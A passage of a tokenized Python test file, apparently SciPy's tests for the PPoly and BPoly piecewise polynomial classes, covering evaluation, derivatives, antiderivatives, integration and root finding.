<EOL> for cls in ( PPoly , BPoly ) : <EOL> p = cls ( c [ ... 
, <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , x ) <EOL> assert_equal ( np . shape ( p ( <NUM_LIT:0.5> ) ) , ( ) ) <EOL> assert_equal ( np . shape ( p ( np . array ( <NUM_LIT:0.5> ) ) ) , ( ) ) <EOL> assert_raises ( ValueError , p , np . array ( [ [ <NUM_LIT:0.1> , <NUM_LIT> ] , [ <NUM_LIT> ] ] ) ) <EOL> def test_complex_coef ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . random . random ( <NUM_LIT> ) ) <EOL> c = np . random . random ( ( <NUM_LIT:8> , <NUM_LIT:12> ) ) * ( <NUM_LIT:1.> + <NUM_LIT> ) <EOL> c_re , c_im = c . real , c . imag <EOL> xp = np . random . random ( <NUM_LIT:5> ) <EOL> for cls in ( PPoly , BPoly ) : <EOL> p , p_re , p_im = cls ( c , x ) , cls ( c_re , x ) , cls ( c_im , x ) <EOL> for nu in [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] : <EOL> assert_allclose ( p ( xp , nu ) . real , p_re ( xp , nu ) ) <EOL> assert_allclose ( p ( xp , nu ) . imag , p_im ( xp , nu ) ) <EOL> def test_axis ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ) <EOL> c_s = c . shape <EOL> xp = np . random . random ( ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> for axis in ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) : <EOL> k , m = c . shape [ axis ] , c . shape [ axis + <NUM_LIT:1> ] <EOL> x = np . sort ( np . random . rand ( m + <NUM_LIT:1> ) ) <EOL> for cls in ( PPoly , BPoly ) : <EOL> p = cls ( c , x , axis = axis ) <EOL> assert_equal ( p . c . shape , <EOL> c_s [ axis : axis + <NUM_LIT:2> ] + c_s [ : axis ] + c_s [ axis + <NUM_LIT:2> : ] ) <EOL> res = p ( xp ) <EOL> targ_shape = c_s [ : axis ] + xp . shape + c_s [ <NUM_LIT:2> + axis : ] <EOL> assert_equal ( res . shape , targ_shape ) <EOL> for p1 in [ cls ( c , x , axis = axis ) . derivative ( ) , <EOL> cls ( c , x , axis = axis ) . derivative ( <NUM_LIT:2> ) , <EOL> cls ( c , x , axis = axis ) . antiderivative ( ) , <EOL> cls ( c , x , axis = axis ) . 
antiderivative ( <NUM_LIT:2> ) ] : <EOL> assert_equal ( p1 . axis , p . axis ) <EOL> for axis in ( - <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ) : <EOL> for cls in ( BPoly , PPoly ) : <EOL> assert_raises ( ValueError , cls , ** dict ( c = c , x = x , axis = axis ) ) <EOL> class TestPolySubclassing ( TestCase ) : <EOL> class P ( PPoly ) : <EOL> pass <EOL> class B ( BPoly ) : <EOL> pass <EOL> def _make_polynomials ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . random . random ( <NUM_LIT:3> ) ) <EOL> c = np . random . random ( ( <NUM_LIT:4> , <NUM_LIT:2> ) ) <EOL> return self . P ( c , x ) , self . B ( c , x ) <EOL> def test_derivative ( self ) : <EOL> pp , bp = self . _make_polynomials ( ) <EOL> for p in ( pp , bp ) : <EOL> pd = p . derivative ( ) <EOL> assert_equal ( p . __class__ , pd . __class__ ) <EOL> ppa = pp . antiderivative ( ) <EOL> assert_equal ( pp . __class__ , ppa . __class__ ) <EOL> def test_from_spline ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . r_ [ <NUM_LIT:0> , np . random . rand ( <NUM_LIT:11> ) , <NUM_LIT:1> ] ) <EOL> y = np . random . rand ( len ( x ) ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> ) <EOL> pp = self . P . from_spline ( spl ) <EOL> assert_equal ( pp . __class__ , self . P ) <EOL> def test_conversions ( self ) : <EOL> pp , bp = self . _make_polynomials ( ) <EOL> pp1 = self . P . from_bernstein_basis ( bp ) <EOL> assert_equal ( pp1 . __class__ , self . P ) <EOL> bp1 = self . B . from_power_basis ( pp ) <EOL> assert_equal ( bp1 . __class__ , self . B ) <EOL> def test_from_derivatives ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> y = [ [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] <EOL> bp = self . B . from_derivatives ( x , y ) <EOL> assert_equal ( bp . __class__ , self . B ) <EOL> class TestPPoly ( TestCase ) : <EOL> def test_simple ( self ) : <EOL> c = np . 
array ( [ [ <NUM_LIT:1> , <NUM_LIT:4> ] , [ <NUM_LIT:2> , <NUM_LIT:5> ] , [ <NUM_LIT:3> , <NUM_LIT:6> ] ] ) <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1> ] ) <EOL> p = PPoly ( c , x ) <EOL> assert_allclose ( p ( <NUM_LIT> ) , <NUM_LIT:1> * <NUM_LIT> ** <NUM_LIT:2> + <NUM_LIT:2> * <NUM_LIT> + <NUM_LIT:3> ) <EOL> assert_allclose ( p ( <NUM_LIT> ) , <NUM_LIT:4> * ( <NUM_LIT> - <NUM_LIT:0.5> ) ** <NUM_LIT:2> + <NUM_LIT:5> * ( <NUM_LIT> - <NUM_LIT:0.5> ) + <NUM_LIT:6> ) <EOL> def test_multi_shape ( self ) : <EOL> c = np . random . rand ( <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1> ] ) <EOL> p = PPoly ( c , x ) <EOL> assert_equal ( p . x . shape , x . shape ) <EOL> assert_equal ( p . c . shape , c . shape ) <EOL> assert_equal ( p ( <NUM_LIT> ) . shape , c . shape [ <NUM_LIT:2> : ] ) <EOL> assert_equal ( p ( np . random . rand ( <NUM_LIT:5> , <NUM_LIT:6> ) ) . shape , <EOL> ( <NUM_LIT:5> , <NUM_LIT:6> ) + c . shape [ <NUM_LIT:2> : ] ) <EOL> dp = p . derivative ( ) <EOL> assert_equal ( dp . c . shape , ( <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> ip = p . antiderivative ( ) <EOL> assert_equal ( ip . c . shape , ( <NUM_LIT:7> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> def test_construct_fast ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:4> ] , [ <NUM_LIT:2> , <NUM_LIT:5> ] , [ <NUM_LIT:3> , <NUM_LIT:6> ] ] , dtype = float ) <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1> ] ) <EOL> p = PPoly . 
construct_fast ( c , x ) <EOL> assert_allclose ( p ( <NUM_LIT> ) , <NUM_LIT:1> * <NUM_LIT> ** <NUM_LIT:2> + <NUM_LIT:2> * <NUM_LIT> + <NUM_LIT:3> ) <EOL> assert_allclose ( p ( <NUM_LIT> ) , <NUM_LIT:4> * ( <NUM_LIT> - <NUM_LIT:0.5> ) ** <NUM_LIT:2> + <NUM_LIT:5> * ( <NUM_LIT> - <NUM_LIT:0.5> ) + <NUM_LIT:6> ) <EOL> def test_vs_alternative_implementations ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:3> , <NUM_LIT:12> , <NUM_LIT> ) <EOL> x = np . sort ( np . r_ [ <NUM_LIT:0> , np . random . rand ( <NUM_LIT:11> ) , <NUM_LIT:1> ] ) <EOL> p = PPoly ( c , x ) <EOL> xp = np . r_ [ <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] <EOL> expected = _ppoly_eval_1 ( c , x , xp ) <EOL> assert_allclose ( p ( xp ) , expected ) <EOL> expected = _ppoly_eval_2 ( c [ : , : , <NUM_LIT:0> ] , x , xp ) <EOL> assert_allclose ( p ( xp ) [ : , <NUM_LIT:0> ] , expected ) <EOL> def test_from_spline ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . r_ [ <NUM_LIT:0> , np . random . rand ( <NUM_LIT:11> ) , <NUM_LIT:1> ] ) <EOL> y = np . random . rand ( len ( x ) ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> ) <EOL> pp = PPoly . from_spline ( spl ) <EOL> xi = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:200> ) <EOL> assert_allclose ( pp ( xi ) , splev ( xi , spl ) ) <EOL> def test_derivative_simple ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . array ( [ [ <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] ] ) . T <EOL> dc = np . array ( [ [ <NUM_LIT:3> * <NUM_LIT:4> , <NUM_LIT:2> * <NUM_LIT:3> , <NUM_LIT:2> ] ] ) . T <EOL> ddc = np . array ( [ [ <NUM_LIT:2> * <NUM_LIT:3> * <NUM_LIT:4> , <NUM_LIT:1> * <NUM_LIT:2> * <NUM_LIT:3> ] ] ) . T <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> pp = PPoly ( c , x ) <EOL> dpp = PPoly ( dc , x ) <EOL> ddpp = PPoly ( ddc , x ) <EOL> assert_allclose ( pp . derivative ( ) . c , dpp . c ) <EOL> assert_allclose ( pp . 
derivative ( <NUM_LIT:2> ) . c , ddpp . c ) <EOL> def test_derivative_eval ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . r_ [ <NUM_LIT:0> , np . random . rand ( <NUM_LIT:11> ) , <NUM_LIT:1> ] ) <EOL> y = np . random . rand ( len ( x ) ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> ) <EOL> pp = PPoly . from_spline ( spl ) <EOL> xi = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:200> ) <EOL> for dx in range ( <NUM_LIT:0> , <NUM_LIT:3> ) : <EOL> assert_allclose ( pp ( xi , dx ) , splev ( xi , spl , dx ) ) <EOL> def test_derivative ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . r_ [ <NUM_LIT:0> , np . random . rand ( <NUM_LIT:11> ) , <NUM_LIT:1> ] ) <EOL> y = np . random . rand ( len ( x ) ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> , k = <NUM_LIT:5> ) <EOL> pp = PPoly . from_spline ( spl ) <EOL> xi = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:200> ) <EOL> for dx in range ( <NUM_LIT:0> , <NUM_LIT:10> ) : <EOL> assert_allclose ( pp ( xi , dx ) , pp . derivative ( dx ) ( xi ) , <EOL> err_msg = "<STR_LIT>" % ( dx , ) ) <EOL> def test_antiderivative_of_constant ( self ) : <EOL> p = PPoly ( [ [ <NUM_LIT:1.> ] ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> assert_equal ( p . antiderivative ( ) . c , PPoly ( [ [ <NUM_LIT:1> ] , [ <NUM_LIT:0> ] ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) . c ) <EOL> assert_equal ( p . antiderivative ( ) . x , PPoly ( [ [ <NUM_LIT:1> ] , [ <NUM_LIT:0> ] ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) . x ) <EOL> def test_antiderivative_regression_4355 ( self ) : <EOL> p = PPoly ( [ [ <NUM_LIT:1.> , <NUM_LIT:0.5> ] ] , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> q = p . antiderivative ( ) <EOL> assert_equal ( q . c , [ [ <NUM_LIT:1> , <NUM_LIT:0.5> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] ) <EOL> assert_equal ( q . x , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> assert_allclose ( p . 
integrate ( <NUM_LIT:0> , <NUM_LIT:2> ) , <NUM_LIT> ) <EOL> assert_allclose ( q ( <NUM_LIT:2> ) - q ( <NUM_LIT:0> ) , <NUM_LIT> ) <EOL> def test_antiderivative_simple ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . array ( [ [ <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] ] ) . T <EOL> ic = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ] ] ) . T <EOL> iic = np . array ( [ [ <NUM_LIT:1> / <NUM_LIT:4> , <NUM_LIT:1> / <NUM_LIT:3> , <NUM_LIT:1> / <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> / <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT> ] ] ) . T <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> ] ) <EOL> pp = PPoly ( c , x ) <EOL> ipp = pp . antiderivative ( ) <EOL> iipp = pp . antiderivative ( <NUM_LIT:2> ) <EOL> iipp2 = ipp . antiderivative ( ) <EOL> assert_allclose ( ipp . x , x ) <EOL> assert_allclose ( ipp . c . T , ic . T ) <EOL> assert_allclose ( iipp . c . T , iic . T ) <EOL> assert_allclose ( iipp2 . c . T , iic . T ) <EOL> def test_antiderivative_vs_derivative ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:30> ) ** <NUM_LIT:2> <EOL> y = np . random . rand ( len ( x ) ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> , k = <NUM_LIT:5> ) <EOL> pp = PPoly . from_spline ( spl ) <EOL> for dx in range ( <NUM_LIT:0> , <NUM_LIT:10> ) : <EOL> ipp = pp . antiderivative ( dx ) <EOL> pp2 = ipp . derivative ( dx ) <EOL> assert_allclose ( pp . c , pp2 . c ) <EOL> for k in range ( dx ) : <EOL> pp2 = ipp . derivative ( k ) <EOL> r = <NUM_LIT> <EOL> endpoint = r * pp2 . x [ : - <NUM_LIT:1> ] + ( <NUM_LIT:1> - r ) * pp2 . x [ <NUM_LIT:1> : ] <EOL> assert_allclose ( pp2 ( pp2 . 
x [ <NUM_LIT:1> : ] ) , pp2 ( endpoint ) , <EOL> rtol = <NUM_LIT> , err_msg = "<STR_LIT>" % ( dx , k ) ) <EOL> def test_antiderivative_vs_spline ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . r_ [ <NUM_LIT:0> , np . random . rand ( <NUM_LIT:11> ) , <NUM_LIT:1> ] ) <EOL> y = np . random . rand ( len ( x ) ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> , k = <NUM_LIT:5> ) <EOL> pp = PPoly . from_spline ( spl ) <EOL> for dx in range ( <NUM_LIT:0> , <NUM_LIT:10> ) : <EOL> pp2 = pp . antiderivative ( dx ) <EOL> spl2 = splantider ( spl , dx ) <EOL> xi = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:200> ) <EOL> assert_allclose ( pp2 ( xi ) , splev ( xi , spl2 ) , <EOL> rtol = <NUM_LIT> ) <EOL> def test_antiderivative_continuity ( self ) : <EOL> c = np . array ( [ [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> ] , [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> ] ] ) . T <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1> ] ) <EOL> p = PPoly ( c , x ) <EOL> ip = p . antiderivative ( ) <EOL> assert_allclose ( ip ( <NUM_LIT:0.5> - <NUM_LIT> ) , ip ( <NUM_LIT:0.5> + <NUM_LIT> ) , rtol = <NUM_LIT> ) <EOL> p2 = ip . derivative ( ) <EOL> assert_allclose ( p2 . c , p . c ) <EOL> def test_integrate ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . r_ [ <NUM_LIT:0> , np . random . rand ( <NUM_LIT:11> ) , <NUM_LIT:1> ] ) <EOL> y = np . random . rand ( len ( x ) ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> , k = <NUM_LIT:5> ) <EOL> pp = PPoly . from_spline ( spl ) <EOL> a , b = <NUM_LIT> , <NUM_LIT> <EOL> ig = pp . integrate ( a , b ) <EOL> ipp = pp . antiderivative ( ) <EOL> assert_allclose ( ig , ipp ( b ) - ipp ( a ) ) <EOL> assert_allclose ( ig , splint ( a , b , spl ) ) <EOL> a , b = - <NUM_LIT> , <NUM_LIT> <EOL> ig = pp . integrate ( a , b , extrapolate = True ) <EOL> assert_allclose ( ig , ipp ( b ) - ipp ( a ) ) <EOL> assert_ ( np . isnan ( pp . 
integrate ( a , b , extrapolate = False ) ) . all ( ) ) <EOL> def test_roots ( self ) : <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> ) ** <NUM_LIT:2> <EOL> y = np . sin ( <NUM_LIT:30> * x ) <EOL> spl = splrep ( x , y , s = <NUM_LIT:0> , k = <NUM_LIT:3> ) <EOL> pp = PPoly . from_spline ( spl ) <EOL> r = pp . roots ( ) <EOL> r = r [ ( r >= <NUM_LIT:0> - <NUM_LIT> ) & ( r <= <NUM_LIT:1> + <NUM_LIT> ) ] <EOL> assert_allclose ( r , sproot ( spl ) , atol = <NUM_LIT> ) <EOL> def test_roots_idzero ( self ) : <EOL> c = np . array ( [ [ - <NUM_LIT:1> , <NUM_LIT> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ - <NUM_LIT:1> , <NUM_LIT> ] ] ) . T <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.0> ] ) <EOL> pp = PPoly ( c , x ) <EOL> assert_array_equal ( pp . roots ( ) , <EOL> [ <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> + <NUM_LIT> ] ) <EOL> const = <NUM_LIT> <EOL> c1 = c . copy ( ) <EOL> c1 [ <NUM_LIT:1> , : ] += const <EOL> pp1 = PPoly ( c1 , x ) <EOL> assert_array_equal ( pp1 . solve ( const ) , <EOL> [ <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> + <NUM_LIT> ] ) <EOL> def test_roots_all_zero ( self ) : <EOL> c = [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> p = PPoly ( c , x ) <EOL> assert_array_equal ( p . roots ( ) , [ <NUM_LIT:0> , np . nan ] ) <EOL> assert_array_equal ( p . solve ( <NUM_LIT:0> ) , [ <NUM_LIT:0> , np . nan ] ) <EOL> assert_array_equal ( p . solve ( <NUM_LIT:1> ) , [ ] ) <EOL> c = [ [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] ] <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> p = PPoly ( c , x ) <EOL> assert_array_equal ( p . roots ( ) , [ <NUM_LIT:0> , np . nan , <NUM_LIT:1> , np . nan ] ) <EOL> assert_array_equal ( p . solve ( <NUM_LIT:0> ) , [ <NUM_LIT:0> , np . nan , <NUM_LIT:1> , np . nan ] ) <EOL> assert_array_equal ( p . solve ( <NUM_LIT:1> ) , [ ] ) <EOL> def test_roots_repeated ( self ) : <EOL> c = np . 
array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] , [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) . T <EOL> x = np . array ( [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> pp = PPoly ( c , x ) <EOL> assert_array_equal ( pp . roots ( ) , [ - <NUM_LIT:2> , <NUM_LIT:0> ] ) <EOL> assert_array_equal ( pp . roots ( extrapolate = False ) , [ <NUM_LIT:0> ] ) <EOL> def test_roots_discont ( self ) : <EOL> c = np . array ( [ [ <NUM_LIT:1> ] , [ - <NUM_LIT:1> ] ] ) . T <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1> ] ) <EOL> pp = PPoly ( c , x ) <EOL> assert_array_equal ( pp . roots ( ) , [ <NUM_LIT:0.5> ] ) <EOL> assert_array_equal ( pp . roots ( discontinuity = False ) , [ ] ) <EOL> assert_array_equal ( pp . solve ( <NUM_LIT:0.5> ) , [ <NUM_LIT:0.5> ] ) <EOL> assert_array_equal ( pp . solve ( <NUM_LIT:0.5> , discontinuity = False ) , [ ] ) <EOL> assert_array_equal ( pp . solve ( <NUM_LIT> ) , [ ] ) <EOL> assert_array_equal ( pp . solve ( <NUM_LIT> , discontinuity = False ) , [ ] ) <EOL> def test_roots_random ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> num = <NUM_LIT:0> <EOL> for extrapolate in ( True , False ) : <EOL> for order in range ( <NUM_LIT:0> , <NUM_LIT:20> ) : <EOL> x = np . unique ( np . r_ [ <NUM_LIT:0> , <NUM_LIT:10> * np . random . rand ( <NUM_LIT:30> ) , <NUM_LIT:10> ] ) <EOL> c = <NUM_LIT:2> * np . random . rand ( order + <NUM_LIT:1> , len ( x ) - <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) - <NUM_LIT:1> <EOL> pp = PPoly ( c , x ) <EOL> for y in [ <NUM_LIT:0> , np . random . random ( ) ] : <EOL> r = pp . solve ( y , discontinuity = False , extrapolate = extrapolate ) <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> for j in range ( <NUM_LIT:3> ) : <EOL> rr = r [ i , j ] <EOL> if rr . size > <NUM_LIT:0> : <EOL> num += rr . 
size <EOL> val = pp ( rr , extrapolate = extrapolate ) [ : , i , j ] <EOL> cmpval = pp ( rr , nu = <NUM_LIT:1> , <EOL> extrapolate = extrapolate ) [ : , i , j ] <EOL> msg = "<STR_LIT>" % ( extrapolate , repr ( rr ) , ) <EOL> assert_allclose ( ( val - y ) / cmpval , <NUM_LIT:0> , atol = <NUM_LIT> , <EOL> err_msg = msg ) <EOL> assert_ ( num > <NUM_LIT:100> , repr ( num ) ) <EOL> def test_roots_croots ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> for k in range ( <NUM_LIT:1> , <NUM_LIT:15> ) : <EOL> c = np . random . rand ( k , <NUM_LIT:1> , <NUM_LIT> ) <EOL> if k == <NUM_LIT:3> : <EOL> c [ : , <NUM_LIT:0> , <NUM_LIT:0> ] = <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> <EOL> for y in [ <NUM_LIT:0> , np . random . random ( ) ] : <EOL> w = np . empty ( c . shape , dtype = complex ) <EOL> _ppoly . _croots_poly1 ( c , w ) <EOL> if k == <NUM_LIT:1> : <EOL> assert_ ( np . isnan ( w ) . all ( ) ) <EOL> continue <EOL> res = <NUM_LIT:0> <EOL> cres = <NUM_LIT:0> <EOL> for i in range ( k ) : <EOL> res += c [ i , None ] * w ** ( k - <NUM_LIT:1> - i ) <EOL> cres += abs ( c [ i , None ] * w ** ( k - <NUM_LIT:1> - i ) ) <EOL> with np . errstate ( invalid = '<STR_LIT:ignore>' ) : <EOL> res /= cres <EOL> res = res . ravel ( ) <EOL> res = res [ ~ np . isnan ( res ) ] <EOL> assert_allclose ( res , <NUM_LIT:0> , atol = <NUM_LIT> ) <EOL> def test_extrapolate_attr ( self ) : <EOL> c = np . array ( [ [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] ] ) . T <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> for extrapolate in [ True , False , None ] : <EOL> pp = PPoly ( c , x , extrapolate = extrapolate ) <EOL> pp_d = pp . derivative ( ) <EOL> pp_i = pp . antiderivative ( ) <EOL> if extrapolate is False : <EOL> assert_ ( np . isnan ( pp ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . all ( ) ) <EOL> assert_ ( np . isnan ( pp_i ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . all ( ) ) <EOL> assert_ ( np . isnan ( pp_d ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . all ( ) ) <EOL> assert_equal ( pp . 
roots ( ) , [ <NUM_LIT:1> ] ) <EOL> else : <EOL> assert_allclose ( pp ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) , [ <NUM_LIT:1> - <NUM_LIT:0.1> ** <NUM_LIT:2> , <NUM_LIT:1> - <NUM_LIT> ** <NUM_LIT:2> ] ) <EOL> assert_ ( not np . isnan ( pp_i ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . any ( ) ) <EOL> assert_ ( not np . isnan ( pp_d ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . any ( ) ) <EOL> assert_allclose ( pp . roots ( ) , [ <NUM_LIT:1> , - <NUM_LIT:1> ] ) <EOL> class TestBPoly ( TestCase ) : <EOL> def test_simple ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> c = [ [ <NUM_LIT:3> ] ] <EOL> bp = BPoly ( c , x ) <EOL> assert_allclose ( bp ( <NUM_LIT:0.1> ) , <NUM_LIT> ) <EOL> def test_simple2 ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> c = [ [ <NUM_LIT:3> ] , [ <NUM_LIT:1> ] ] <EOL> bp = BPoly ( c , x ) <EOL> assert_allclose ( bp ( <NUM_LIT:0.1> ) , <NUM_LIT:3> * <NUM_LIT> + <NUM_LIT:1.> * <NUM_LIT:0.1> ) <EOL> def test_simple3 ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> c = [ [ <NUM_LIT:3> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:4> ] ] <EOL> bp = BPoly ( c , x ) <EOL> assert_allclose ( bp ( <NUM_LIT> ) , <EOL> <NUM_LIT:3> * <NUM_LIT> * <NUM_LIT> + <NUM_LIT:1> * <NUM_LIT:2> * <NUM_LIT> * <NUM_LIT> + <NUM_LIT:4> * <NUM_LIT> * <NUM_LIT> ) <EOL> def test_simple4 ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> c = [ [ <NUM_LIT:1> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] ] <EOL> bp = BPoly ( c , x ) <EOL> assert_allclose ( bp ( <NUM_LIT> ) , <NUM_LIT> ** <NUM_LIT:3> + <EOL> <NUM_LIT:3> * <NUM_LIT> ** <NUM_LIT:2> * <NUM_LIT> + <EOL> <NUM_LIT:3> * <NUM_LIT> * <NUM_LIT> ** <NUM_LIT:2> + <EOL> <NUM_LIT:2> * <NUM_LIT> ** <NUM_LIT:3> ) <EOL> def test_simple5 ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> c = [ [ <NUM_LIT:1> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:8> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:1> ] ] <EOL> bp = BPoly ( c , x ) <EOL> assert_allclose ( bp ( <NUM_LIT> ) , <NUM_LIT> ** <NUM_LIT:4> + <EOL> <NUM_LIT:4> * <NUM_LIT> ** 
<NUM_LIT:3> * <NUM_LIT> + <EOL> <NUM_LIT:8> * <NUM_LIT:6> * <NUM_LIT> ** <NUM_LIT:2> * <NUM_LIT> ** <NUM_LIT:2> + <EOL> <NUM_LIT:2> * <NUM_LIT:4> * <NUM_LIT> * <NUM_LIT> ** <NUM_LIT:3> + <EOL> <NUM_LIT> ** <NUM_LIT:4> ) <EOL> def test_multi_shape ( self ) : <EOL> c = np . random . rand ( <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1> ] ) <EOL> p = BPoly ( c , x ) <EOL> assert_equal ( p . x . shape , x . shape ) <EOL> assert_equal ( p . c . shape , c . shape ) <EOL> assert_equal ( p ( <NUM_LIT> ) . shape , c . shape [ <NUM_LIT:2> : ] ) <EOL> assert_equal ( p ( np . random . rand ( <NUM_LIT:5> , <NUM_LIT:6> ) ) . shape , <EOL> ( <NUM_LIT:5> , <NUM_LIT:6> ) + c . shape [ <NUM_LIT:2> : ] ) <EOL> dp = p . derivative ( ) <EOL> assert_equal ( dp . c . shape , ( <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> def test_interval_length ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:2> ] <EOL> c = [ 